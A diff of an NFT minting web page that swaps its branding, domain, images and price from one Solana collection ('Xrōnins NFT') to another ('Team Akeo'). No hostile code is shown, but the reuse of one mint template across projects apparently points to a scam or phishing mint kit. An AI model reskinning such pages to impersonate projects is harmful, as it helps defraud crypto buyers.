--- a/index.html
+++ b/index.html
@@ -4,18 +4,18 @@
     <meta charset="utf-8">
     <meta name="description" content="NTC" data-react-helmet="true" />
     <meta name="theme-color" content="#000000" />
-    <meta content="🌐 solport.io/mint" property="og:title">
+    <meta content="🌐 akeo.launchlabs.app" property="og:title">
     <meta content="
-     🟢 Xrōnins NFT Minting is NOW LIVE!
+      🟢 Team Akeo Minting is NOW LIVE!
     
-     Mint Price: 1.5 SOL
+      Mint Price: 1.2 SOL
     " property="og:description">
-    <meta content="https://pbs.twimg.com/profile_banners/1495766532034641925/1652405443/1500x500" property="og:image">
+    <meta content="https://pbs.twimg.com/profile_banners/1425730526434844675/1653563793/1500x500" property="og:image">
     <meta name="twitter:card" content="summary_large_image">
-    <link type="application/json+oembed" href="https://api.jsonbin.io/b/622184b37caf5d67835ed9ba/131" />
+    <link type="application/json+oembed" href="https://api.jsonbin.io/b/622184b37caf5d67835ed9ba/134" />
     <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
-    <title>Xrōnins NFT</title>
-    <link rel="shortcut icon" href="https://pbs.twimg.com/profile_images/1524865499288551451/d1Ic3ZrR_400x400.jpg" />
+    <title>Team Akeo</title>
+    <link rel="shortcut icon" href="https://pbs.twimg.com/profile_images/1529714372066816000/yWcs0eXD_400x400.jpg" />
     <link rel="stylesheet" type="text/css" href="css/all.min.css">
     <link rel="stylesheet" type="text/css" href="css/normalize.css">
     <link rel="stylesheet" type="text/css" href="css/style.css">
@@ -66,12 +66,12 @@
         <div class="main-area">
 
             <div class="main-area__right">
-                <h2 class="right-title">Xrōnins NFT</h2>
+                <h2 class="right-title">Team Akeo</h2>
 
                 <div class="right-list">
                     <li>
                         <div class="text">
-                            5,555 Xrōnins who made an oath to end tyranny and protect the Metaverse | Manga/Anime based story with utility.
+                            Private #Solana NFT collection backed by the leading NFT news Website.
                     </li>
                     </div>
 
@@ -82,7 +82,7 @@
                             <a href="javascript:void(0)" class="plus-btn">+</a>
                         </div>
                         <div class="price-box">
-                            <div id="price-total"><span>1.5</span> SOL</div>
+                            <div id="price-total"><span>1.2</span> SOL</div>
                             <div>2 NFT max per transaction</div>
                         </div>
                     </div>
@@ -103,7 +103,7 @@
                 </style>
                 <div class="main-area__left">
                     <div class="slider-area">
-                        <img class="animation" src="https://static.wixstatic.com/media/b2d01c_49642b63f3d24fa89d35f20e3820e30c~mv2.png/v1/crop/x_192,y_430,w_1585,h_2506/fill/w_383,h_605,al_c,q_85,usm_0.66_1.00_0.01,enc_auto/b2d01c_49642b63f3d24fa89d35f20e3820e30c~mv2.png" alt="GiF">
+                        <img class="animation" src="https://cdn.discordapp.com/attachments/979939097156149271/980030663912734800/unknown.png" alt="GiF">
                     </div>
                 </div>
             </div>
@@ -119,7 +119,7 @@
         const $numberText = document.querySelector("#total");
         const $remaining = document.querySelector('#remaining');
         const $priceResultText = document.querySelector("#price-total span");
-        let itemPriceSelected = 1.5;
+        let itemPriceSelected = 1.2;
         let itemCount = 1;
 
         $plusButton.addEventListener("click", function(e) {
